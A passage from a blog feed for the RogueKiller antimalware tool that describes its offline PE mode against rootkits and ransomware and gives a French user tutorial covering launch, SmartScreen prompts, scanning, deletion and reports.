&lt;br /&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;h2 style="text-align: left;"&gt;
&lt;span style="color: #741b47;"&gt;&lt;span style="font-size: large;"&gt;&lt;i&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-size: large;"&gt;R&lt;span style="font-size: large;"&gt;OGUEKILLER PE&lt;/span&gt; &lt;/span&gt;&lt;/span&gt;&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;span style="color: #0b5394;"&gt;&lt;span style="font-size: large;"&gt;&lt;i&gt;&amp;nbsp;&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;span style="font-size: small;"&gt;RogueKiller is &lt;span style="font-size: small;"&gt;now able to read &lt;a href="http://msdn.microsoft.com/en-us/library/windows/desktop/ms724877%28v=vs.85%29.aspx"&gt;Windows hives&lt;/a&gt;&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt; i&lt;/span&gt;n &lt;i&gt;&lt;b&gt;Offline&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;. It means RogueKiller is able to:&lt;br /&gt;
&lt;br /&gt;
&lt;ol&gt;
&lt;li&gt;&lt;b&gt;Detect hidden registry keys&lt;/b&gt; (rootkit)&lt;/li&gt;
&lt;li&gt;Detect and remove registry keys from an operating system in an &lt;b&gt;external hard drive&lt;/b&gt; (other than system hard drive).&lt;/li&gt;
&lt;li&gt;Detect and remove registry keys of a PC started &lt;b&gt;from a live CD&lt;/b&gt; (ex: OTLPE)&lt;/li&gt;
&lt;/ol&gt;
This can be useful when a rootkit hides/protects its registry keys, or when a PC is locked by a ransomware.&lt;br /&gt;
&lt;br /&gt;
Here's a demonstration of the PE mode on a PC infected with the malware &lt;i&gt;&lt;b&gt;Gendarmerie&lt;/b&gt;&lt;/i&gt;, and started with live CD OTLPE:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;object class="BLOGGER-youtube-video" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" data-thumbnail-src="http://i.ytimg.com/vi/w55mDdgyk_s/0.jpg" height="375" width="600"&gt;&lt;param name="movie" value="http://www.youtube.com/v/w55mDdgyk_s?version=3&amp;f=user_uploads&amp;c=google-webdrive-0&amp;app=youtube_gdata" /&gt;&lt;param name="bgcolor" value="#FFFFFF" /&gt;&lt;param name="allowFullScreen" value="true" /&gt;&lt;embed width="600" height="375"  src="http://www.youtube.com/v/w55mDdgyk_s?version=3&amp;f=user_uploads&amp;c=google-webdrive-0&amp;app=youtube_gdata" type="application/x-shockwave-flash" allowfullscreen="true"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;&lt;img src="http://feeds.feedburner.com/~r/Tigzy-rk/~4/ZFzSwEtNhic" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://tigzyrk.blogspot.com/feeds/5052223659020285952/comments/default" title="Publier les commentaires" /><link rel="replies" type="text/html" href="http://tigzyrk.blogspot.com/2012/11/en-roguekiller-official-tutorial.html#comment-form" title="0 commentaires" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8972660870357177426/posts/default/5052223659020285952?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8972660870357177426/posts/default/5052223659020285952?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/Tigzy-rk/~3/ZFzSwEtNhic/en-roguekiller-official-tutorial.html" title="[EN] RogueKiller official tutorial" /><author><name>tigzy-RK</name><uri>http://www.blogger.com/profile/09732073712132941191</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="24" src="http://2.bp.blogspot.com/-ZTcduhIm5tM/TamcgoAE1dI/AAAAAAAAABg/Gqy2hRs5Vy0/s220/tigzy1295109643.gif" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-PMhXgThN7mw/UJU02mU6MkI/AAAAAAAAASg/KCwqy6FsFEM/s72-c/Capture.PNG" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://tigzyrk.blogspot.com/2012/11/en-roguekiller-official-tutorial.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DUIAQHw8cSp7ImA9WhNWFEo.&quot;"><id>tag:blogger.com,1999:blog-8972660870357177426.post-3064105795964356585</id><published>2012-10-30T07:39:00.000-07:00</published><updated>2012-12-14T01:32:21.279-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2012-12-14T01:32:21.279-08:00</app:edited><title>[FR] RogueKiller tutoriel officiel</title><content type="html">&lt;h2 style="text-align: center;"&gt;
&lt;span style="font-size: x-large;"&gt;&lt;span style="color: #3d85c6;"&gt;RogueKiller : &lt;span style="font-size: x-large;"&gt;T&lt;/span&gt;utoriel officiel &lt;/span&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-2lstW-aOdOg/UE2ejGECGXI/AAAAAAAAAH4/iLdvoDx2vQE/s1600/Pr%C3%A9sentation1.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;br /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;h3&gt;
&lt;span style="color: #073763; font-size: large;"&gt;&lt;i&gt;&lt;b&gt;Ceci est un guide d'utilisation de RogueKiller, outil de désinfection antivirus que l'on peut télécharger ici : &lt;span style="color: #351c75;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;h3&gt;
&lt;span style="color: #073763;"&gt;&lt;i&gt;&lt;b&gt;&lt;span style="color: #351c75;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;h3 style="text-align: center;"&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="color: #073763;"&gt;&lt;b&gt;&lt;span style="color: #351c75;"&gt;&lt;a href="http://www.sur-la-toile.com/RogueKiller/" target="_blank"&gt;_ RogueKiller _&lt;/a&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;RogueKiller &lt;/b&gt;est compatible &lt;span style="color: #741b47;"&gt;&lt;b&gt;Windows XP, Server 2003, Vista, Server 2008, Win7, Win8&lt;/b&gt;&lt;/span&gt;.&lt;br /&gt;
&lt;b&gt;RogueKiller &lt;/b&gt;est compatible avec les &lt;b&gt;&lt;span style="color: #741b47;"&gt;Systèmes 32 bits et 64 bits&lt;/span&gt;.&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;ol&gt;
&lt;li&gt;&lt;span style="background-color: white;"&gt;Commencer par télécharger l'outil sur le bureau, et &lt;u&gt;&lt;i&gt;quitter tous les programmes en cours&lt;/i&gt;&lt;/u&gt;.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="color: #0b5394;"&gt;&lt;span style="background-color: white;"&gt;&lt;span style="color: black;"&gt;Lancer &lt;b&gt;RogueKiller.exe. &lt;/b&gt;Si le programme est tué par un malware, ne pas hesiter à renommer l'exécutable en &lt;b&gt;winlogon.exe&lt;/b&gt;, ou &lt;b&gt;changer l'extension de fichier en .com &lt;/b&gt;(ex: Roguekiller.com)&lt;/span&gt;&lt;b&gt; &lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;h2 style="text-align: left;"&gt;
&lt;span style="font-size: large;"&gt;&lt;i&gt;&lt;span style="color: #0b5394;"&gt;PRESENTATION VIDEO&lt;/span&gt;&lt;/i&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;i&gt;&lt;span style="color: #0b5394;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/i&gt;&lt;/h3&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;object class="BLOGGER-youtube-video" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" data-thumbnail-src="http://i.ytimg.com/vi/kkd30mefyrU/0.jpg" height="375" width="600"&gt;&lt;param name="movie" value="http://www.youtube.com/v/kkd30mefyrU?version=3&amp;f=user_uploads&amp;c=google-webdrive-0&amp;app=youtube_gdata" /&gt;&lt;param name="bgcolor" value="#FFFFFF" /&gt;&lt;param name="allowFullScreen" value="true" /&gt;&lt;embed width="600" height="375"  src="http://www.youtube.com/v/kkd30mefyrU?version=3&amp;f=user_uploads&amp;c=google-webdrive-0&amp;app=youtube_gdata" type="application/x-shockwave-flash" allowfullscreen="true"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;/div&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;i&gt;&lt;span style="color: #0b5394;"&gt;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;/i&gt;&lt;/h3&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;i&gt;&lt;span style="color: #0b5394;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/i&gt;&lt;/h3&gt;
&lt;h2 style="text-align: left;"&gt;
&lt;span style="color: #741b47;"&gt;&lt;span style="font-size: large;"&gt;&lt;i&gt;SMARTSCREEN&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;span style="color: #0b5394;"&gt;&lt;span style="font-size: large;"&gt;&lt;i&gt;&amp;nbsp;&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;Sous les systèmes &lt;span style="font-size: small;"&gt;d'exploitation récents (Windows 7 &lt;span style="font-size: small;"&gt;/ Windows 8), &lt;b&gt;le filtre SmartScreen empêche l'exéc&lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;ution de programmes &lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;i&lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;nconnus&lt;/b&gt; (&lt;span style="font-size: small;"&gt;de Microsoft). &lt;b&gt;Pour &lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;passer outre cette protection&lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt; et pouvoir lancer RogueKiller&lt;/b&gt;, &lt;span style="font-size: small;"&gt;procéder comme suit:&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;ol&gt;
&lt;li&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;Cliquer sur &lt;i&gt;&lt;b&gt;Informations complémentaires&lt;/b&gt;&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;Puis sur &lt;i&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;Exécuter&lt;/span&gt; quand même.&amp;nbsp;&lt;/b&gt;&lt;/i&gt;&lt;/span&gt; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-PMhXgThN7mw/UJU02mU6MkI/AAAAAAAAASg/KCwqy6FsFEM/s1600/Capture.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="200" src="http://3.bp.blogspot.com/-PMhXgThN7mw/UJU02mU6MkI/AAAAAAAAASg/KCwqy6FsFEM/s640/Capture.PNG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-748Zcm_dEvc/UJU03rUuW0I/AAAAAAAAASk/hSh_4fk2RJs/s1600/Capture2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="238" src="http://4.bp.blogspot.com/-748Zcm_dEvc/UJU03rUuW0I/AAAAAAAAASk/hSh_4fk2RJs/s640/Capture2.PNG" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;i&gt;&lt;span style="color: #0b5394;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/i&gt;&lt;/h3&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;i&gt;&lt;span style="color: #0b5394;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/i&gt;&lt;/h3&gt;
&lt;h2 style="text-align: left;"&gt;
&lt;span style="font-size: large;"&gt;&lt;i&gt;&lt;span style="color: #0b5394;"&gt;PRESCAN&lt;/span&gt;&lt;/i&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;i&gt;&lt;span style="color: #0b5394;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/i&gt;&lt;/h3&gt;
Le &lt;b&gt;Prescan &lt;/b&gt;est démarré automatiquement au lancement du programme. Il a pour effet de &lt;b&gt;stopper les processus nuisibles, stopper les services infectieux&lt;/b&gt;, &lt;i&gt;charger le driver et faire des vérifications de version&lt;/i&gt;. A ce stade &lt;b&gt;aucune action de l'utilisateur n'est requise&lt;/b&gt;, car tout le traitement est réversible par un simple redémarrage du PC et est donc inoffensif.&lt;br /&gt;
&lt;br /&gt;
Il se peut que RogueKiller détecte &lt;b&gt;une nouvelle version disponible et propose son téléchargement&lt;/b&gt;. Dans ce cas, on peut soit accepter et être redirigé vers la page de téléchargement ou refuser et continuer l'utilisation normale avec la version périmée. &lt;b&gt;Il est très fortement conseillé de toujours lancer la version la plus récente!&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
La liste des processus / services stoppés se trouve dans l'onglet &lt;b&gt;&lt;i&gt;Processus&lt;/i&gt;&lt;/b&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt; Note importante! L'icone "driver" (carré vert/rouge) ne vire au vert que lorsque le driver est chargé. Le driver ne peut pas être chargé sur des OS 64 bits.&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;i&gt;&lt;span style="color: #0b5394;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/i&gt;&lt;/h3&gt;
&lt;h2 style="text-align: left;"&gt;
&lt;span style="color: #0b5394; font-size: large;"&gt;&lt;i&gt;SCAN&lt;/i&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;span style="color: #0b5394;"&gt;&lt;span style="font-size: large;"&gt;&lt;i&gt;&amp;nbsp;&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;Le scan est déclenché par appui sur le bouton&lt;span style="font-size: small;"&gt; &lt;i&gt;&lt;b&gt;Scan. &lt;/b&gt;&lt;/i&gt;&lt;span style="font-size: small;"&gt;C'est la première étape naturelle à effectuer &lt;span style="font-size: small;"&gt;après la fin du Prescan. &lt;/span&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;Le scan est un traitement n'apportant &lt;b&gt;aucune modification sur le système&lt;/b&gt;, car il ne fait que répertorier les anomalies rencontrées et les afficher à l'utilis&lt;span style="font-size: small;"&gt;a&lt;span style="font-size: small;"&gt;teur. Parmi les op&lt;span style="font-size: small;"&gt;érations effectuées&lt;span style="font-size: small;"&gt;, une vérification des &lt;b&gt;entrées de démarrage automatique&lt;/b&gt; (clés RUN, Services, Taches planifiées, dossiers de démarrages), e&lt;span style="font-size: small;"&gt;t &lt;/span&gt;des &lt;b&gt;détournement&lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;s &lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;d&lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;u fonctionnement normal&lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt; de Windows&lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;i&gt;. &lt;/i&gt;&lt;span style="font-size: small;"&gt;Le scan fait aussi une recherche de certaines infections connues, ainsi qu'une vérifi&lt;span style="font-size: small;"&gt;cation de la &lt;b&gt;présence de rootkits&lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt; au sein du noyau&lt;/b&gt; (avec l'aide du driver)&lt;span style="font-size: small;"&gt; et pour terminer une &lt;b&gt;vérification du secteur de démarrage&lt;/b&gt; (MBR).&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;Une fois le &lt;span style="font-size: small;"&gt;scan terminé, &lt;b&gt;un rapport texte est disponible&lt;/b&gt;&lt;span style="font-size: small;"&gt; en cliquant sur le bouton &lt;i&gt;&lt;b&gt;Rapport. &lt;/b&gt;&lt;/i&gt;Ce dernier est a&lt;span style="font-size: small;"&gt;ussi sur le bureau (RKReport[#]&lt;span style="font-size: small;"&gt;.txt).&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;i&gt;&amp;nbsp;&lt;/i&gt; &lt;/h3&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-esDEOH1a4oQ/UIpYUmL-P4I/AAAAAAAAAQw/PyphOBKwGA4/s1600/prescan.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="480" src="http://3.bp.blogspot.com/-esDEOH1a4oQ/UIpYUmL-P4I/AAAAAAAAAQw/PyphOBKwGA4/s640/prescan.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Déclenchement du scan&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-3ycZlL9bVHw/UIpYV0rKLuI/AAAAAAAAAQ4/nTW6z7B1ibA/s1600/proxydns.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;br /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;h3 style="text-align: left;"&gt;
&amp;nbsp;
&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;/h3&gt;
&lt;h2 style="text-align: left;"&gt;
&lt;span style="color: #0b5394; font-size: large;"&gt;&lt;i&gt;S&lt;span style="font-size: large;"&gt;UPPRESSION&lt;/span&gt;&lt;/i&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;span style="color: #0b5394;"&gt;&lt;span style="font-size: large;"&gt;&lt;i&gt;&amp;nbsp;&lt;/i&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;div style="text-align: left;"&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;L&lt;span style="font-size: small;"&gt;a suppression &lt;/span&gt;est déclenchée par appui sur le bouton&lt;span style="font-size: small;"&gt; &lt;i&gt;&lt;b&gt;Suppression. &lt;/b&gt;&lt;/i&gt;&lt;span style="font-size: small;"&gt;Au préalable il conviendra de &lt;b&gt;vérifier les résultats du scan dans les différents onglets&lt;/b&gt;, o&lt;span style="font-size: small;"&gt;u&lt;/span&gt; par le rapport&lt;span style="font-size: small;"&gt; texte. &lt;b&gt;&lt;span style="color: #990000;"&gt;Les éléments supprimés/&lt;/span&gt;&lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: #990000;"&gt;restaurés sont uniquement ceux de l'ong&lt;/span&gt;&lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: #990000;"&gt;let &lt;i&gt;&lt;span style="font-size: small;"&gt;R&lt;/span&gt;&lt;/i&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="color: #990000;"&gt;&lt;i&gt;egistre &lt;/i&gt;et de l'onglet &lt;i&gt;Fichiers&lt;/i&gt;.&lt;/span&gt;&lt;/b&gt; Si vous av&lt;span style="font-size: small;"&gt;ez des doutes, voir les sections suivantes sur les compléments d'analyse.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;Si certaines choses vous paraissent anormales et ne doivent pas être supprimées, &lt;b&gt;vous avez la possibilité de les décocher (on&lt;span style="font-size: small;"&gt;glet &lt;span style="font-size: small;"&gt;&lt;i&gt;Registre &lt;/i&gt;seulement)&lt;/span&gt;&lt;/span&gt; avant la suppression&lt;/b&gt;&lt;span style="font-size: small;"&gt; (et me les signaler par mail!). Contrairement au scan, la suppression&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt; fait des &lt;b&gt;modification sur le systèm&lt;span style="font-size: small;"&gt;e,&lt;span style="font-size: small;"&gt; &lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;car c'est ce qui permet de supprimer les infections. Toutef&lt;span style="font-size: small;"&gt;ois, chaque clé de registre modifiée est &lt;b&gt;a&lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;u &lt;/b&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;&lt;span style="font-size: small;"&gt;préalable&lt;/span&gt; sauvegardée dans le dossier RK_Quarantine&lt;/b&gt; (voi&lt;span style="font-size: small;"&gt;r ci-après).&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: large;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;Une fois l&lt;span style="font-size: small;"&gt;a suppression terminé, &lt;b&gt;un rapport texte est disponible&lt;/b&gt;&lt;span style="font-size: small;"&gt; en cliquant sur le bouton &lt;i&gt;&lt;b&gt;Rapport. &lt;/b&gt;&lt;/i&gt;Ce dernier est a&lt;span style="font-size: small;"&gt;ussi sur le bureau (RKReport[#]&lt;span style="font-size: small;"&gt;.txt). Il se peut également que le programme demande à redémarrer le PC. Si c'est le cas&lt;span style="font-size: small;"&gt;, il faut le faire impérativement car certaines infections p&lt;span style="font-size: small;"&gt;ourraient avoir l&lt;span style="font-size: small;"&gt;e temps de se réactiver dans le cas contraire.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
